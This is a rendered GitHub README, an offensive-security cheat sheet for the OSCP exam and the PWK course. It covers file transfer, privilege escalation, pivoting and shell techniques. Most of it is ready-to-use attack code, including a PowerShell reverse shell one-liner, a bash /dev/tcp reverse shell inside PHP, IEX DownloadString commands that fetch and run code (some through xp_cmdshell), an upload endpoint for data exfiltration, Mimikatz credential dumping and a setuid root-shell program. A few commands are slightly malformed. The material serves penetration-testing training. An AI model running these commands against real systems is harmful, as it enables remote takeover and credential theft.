Home

Awesome

JustTryHarder

JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam.

(Inspired by PayloadAllTheThings)

Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖

Hacktoberfest friendly! Yes, we are open to Pull Requests for Hacktoberfest! Please ensure its not spam and actually contributes well to this repo. Thanks & happy hacking!

Disclaimer: None of the below includes spoilers for the PWK labs / OSCP Exam.

Credit Info: I have obtained a lot of this info through other Github repos, blogs, sites and more. I have tried to give as much credit to the original creator as possible, if I have not given you credit please contact me on Twitter: https://twitter.com/s1nfulz

Determining the OS of a host via Ping


ping 10.10.10.110
PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data.
64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms

The TTL can be used to determine the OS of the host. The three different types of TTL are as shown below:

BOF (WIP)


(Typical bad characters include: 0x00, 0x0A, 0x0D)

Good BOF resources:

Breakouts / Environment Escapes


DNS - Zone Transfers


File Transfers


SMB Transfer

On the Victim machine (Windows)

net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:

Wget Transfer

How to retrieve file(s) from host (inside a reverse shell)

# Place file you want transferred in /var/www/html/
service apache2 start
# Run on the remote server
# wget http://10.10.10.10/pspy64 # <- for single file
# wget -r http://10.10.10.10/pspy64/ <- for folder

TFTP Transfer

(How to transfer from Kali to Windows)

Using MSF.

Start MSF before these steps:

Inside MSF

  1. use auxiliary/server/tftp
  2. set TFTPROOT /usr/share/mimikatz/Win32/
  3. run

Inside a terminal

  1. tftp -i 10.10.10.10 GET mimikatz.exe

NetCat (Windows to Kali)

  1. Windows: nc -nv 10.11.0.61 4444 < bank-account.zip

  2. Linux: nc -nlvp 4444 > bank-account.zip

PowerShell

Invoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\Users\Victim\exploit.py

Without an interactive powershell session:

# Create wget.ps1
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)

Base64 (Linux -> Linux)

Local Host:

  1. $(echo "cat /path/to/exploit.py | base64") > encoded.b64
  2. Transfer encoded.b64 to the remote server via nc or otherwise.

Remote Server - Linux:

  1. cat /path/to/encoded.b64 | base64 -d > exploit.py

Remove Server - Powershell

Certutil

certutil.exe -urlcache -split -f "http://ip.for.kali.box/file-to-get.zip" name-to-save-as.zip

HTTP File Upload (Exfiltration)

Upload:

  1. Create upload.php file in attacking machine webroot, /var/www/html by default.
<?php
$uploaddir = '/var/www/uploads/';

$uploadfile = $uploaddir . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
  1. Create upload directory and set appropriate permissions to allow upload.
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
  1. Upload file from victim machine to attacking machine using PowerShell:
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('http://10.10.10.10/upload.php', 'file-to-upload.txt')"

Kerberoasting

LFI / RFI

PHP Reverse Shell:

<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); Command Injection: <?php echo shell_exec(whoami);?>

MSSQL / SQLi

Password Cracking

Hashcat

John The Ripper

Password Spraying (CrackMapExec)

Payload Generation

PHP

Priv Esc - Linux

If GCC & wget is installed, the system MIGHT be vulnerable to a kernel exploit

#include<stdio.h>
#include<unistd.h>
#include<sys/types.h>

int main(){
    setuid(geteuid());
    system("/bin/bash");
    return 0;
}

Priv Esc - Windows

Post Exploitation

  1. Mimikatz.exe (run it)
  2. privilege::debug
  3. sekurlsa::logonpasswords

Port Forwarding

• Local -- Forward local port to remote host.
• Remote -- Forward remote port to local host.
• Dynamic -- Use SOCKS.

Use local if you have a service running on a machine that can be reached from the remote machine, and you want to access it directly from the local machine. After setting up the tunneling you will be able to access the service using your local host IP (127.0.0.1)

Use remote if you have a service that can be reached from the local machine, and you need to make it available to the remote machine. It opens the listening socket on the machine you have used SSH to log into. 

Dynamic is like local, but on the client side it behaves like a SOCKS proxy. Use it if you need to connect with a software that expects SOCKS forwarding.

Chisel local system:

./chisel server -p 8080 --reverse

victim:

./chisel client YOUR_IP:8080 R:1234:127.0.0.1:1234

Plink

SSH

  1. Generate an SSH key pair on the box being pivoted through to protect your credentials.
ssh-keygen
cat ~/.ssh/id_rsa.pub
  1. Copy the pulic key output from the above command. Add this value and the pivot machine's IP address to the ~/.ssh/authorized_keys file on your attacking (Kali) machine using the syntax below. If you do not already have this file, simple create a new file and add the contents below.
from="[VICTIM_MACHINE_IP_ADDRESS]",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty [PUBLIC_KEY_VALUE]
  1. Ensure the SSH service is running on your attacking (Kali) machine.
sudo service ssh start
  1. Initiate SSH call from the box being pivoted through and specify the id_rsa private key generated in step 1. This private key may be called something else if you changed the name when generating. Ensure the username and IP address of your attacking machine are correct.
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /[PATH_TO_YOUR_PRIVATE_KEY]/id_rsa kali@[ATTACKING_MACHINE_IP]
  1. Edit your /etc/proxychains.conf file to add the line below.
socks4 127.0.0.1 1080
  1. Prepend the proxychains command to pivot through the compromised host using proxy chains. When scanning with nmap, be sure to use TCP Connect scans e.g.
sudo proxychains nmap -sT -p80 -sC -sV --open -Pn -n 10.10.10.10

Additional Notes:

Socks Proxy (using PowerShell)

Local

Port Scanning

TCP

UDP (can take hours so maybe netstat is a better alternative)

SNMP nmap -p161 -sU -iL ips.txt > udp.txt (cmd could be wrong, double check)

SSH nmap --script ssh2-enum-algos -iL ips.txt > SSH.txt

SSL nmap -v -v --script ssl-cert,ssl-enum-ciphers,ssl-heartbleed,ssl-poodle,sslv2 -iL ips.txt > SSLScan.txt

NMAP Bootstrap Report nmap -oA poison --stylesheet nmap-bootstrap.xsl 10.10.10.10 firefox nmap-bootstrap.xsl

Ping Sweep

Linux (basic one liners)

Linux (script)

for i in `seq 1 255`
do
    ping -c1 192.168.125.$i 2>/dev/null 1>&2
    if [[ $? -eq 0 ]]
    then
        echo 192.168.125.$i is up
    fi
done

Windows (cmd)

Windows (PowerShell)

Nmap

Pivoting

Remote Desktop

Responder

Reverse Shells

Linux

Windows

Shell Upgrading

Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ & https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

SQL Injection (SQLmap)

Python

  1. python -c 'import pty;spawn("/bin/bash");' or
  2. python3 -c 'import pty;spawn("/bin/bash");'
  3. In reverse shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

- In Kali

3. stty raw -echo
4. fg

- In reverse shell
5. reset (sometimes optional)
6. export SHELL=bash
7. export TERM=xterm-256color
8. stty rows <num> columns <cols> (optional)
(Sometimes the command will need to be executed: export TERM=xterm)

Using socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Perl

  1. perl -e 'exec "/bin/sh";'
  2. perl: exec "/bin/sh";

Bash

/bin/sh -i

Show listening ports

SMB - Enumeration

SMB - Impacket

Password: (password)

[*] Trying protocol 445/SMB...

  1. cd /usr/share/windows-binaries
  2. python /usr/share/doc/python-impacket/examples/smbserver.py a .
  3. \\10.10.10.10\a\mimikatz.exe

SMTP Enumeration

https://github.com/s0wr0b1ndef/OSCP-note/blob/master/ENUMERATION/SMTP/smtp_commands.txt

ICMP Injection

  1. ping -n 3 10.10.10.10
  2. tcpdump -i tun0 icmp

VMware (not going full screen)

systemctl restart open-vm-tools.service

Web Servers:

Web Scanning:

Web Scanning with extensions

Linux (Example web server might be Apache) gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,jsp,pl -s 200,204,301,302,307,403,401

Windows (Example web server might be IIS)

gobuster dir -e -u http://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,asp,aspx,jsp,bak -s 200,204,301,302,307,403,401

Linux (Example web server might be Apache)

python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,jsp,pl -t 50

Windows (Example web server might be IIS)

python3 dirsearch.py -r -u http://10.10.10.131/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e php,html,js,txt,asp,aspx,jsp,bak -t 50

HTTP gobuster dir -u http://10.10.10.10 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -t 69

HTTPS gobuster dir -k -u https://10.10.10.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 69 (in some cases --wildcard will need to be used instead of -k)

Nikto nikto -h 10.10.10.10 -p 80

Nikto HTTPS ``nikto -h 10.10.10.10 -p 443```

WFuzz wfuzz -u http://10.10.10.10/hello.php?dir=../../../../../../../../../FUZZ%00 -w /usr/share/wfuzz/wordlist/general/common.txt

Web Shells

WordPress

Windows Framework / Powershell

bypass PowerShell execution policy


powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -
IEX(New-object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1')

powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.14.x/Whatever.ps1'); Invoke-Whatever"
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.10.10/Nishang-ReverseShell.ps1\")
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://server/path/to/file', 'nameforefile')`

Windows Post Exploitation Commands

Writeable Directories

Windows


list from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md The following folders are by default writable by normal users (depends on Windows version - This is from W10 1803)

C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

Linux

To find World Writeable Directories in Linux use the command: find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

Todo List:

Thank you:

Thanks to these people for including my cheatsheet on their website/blog: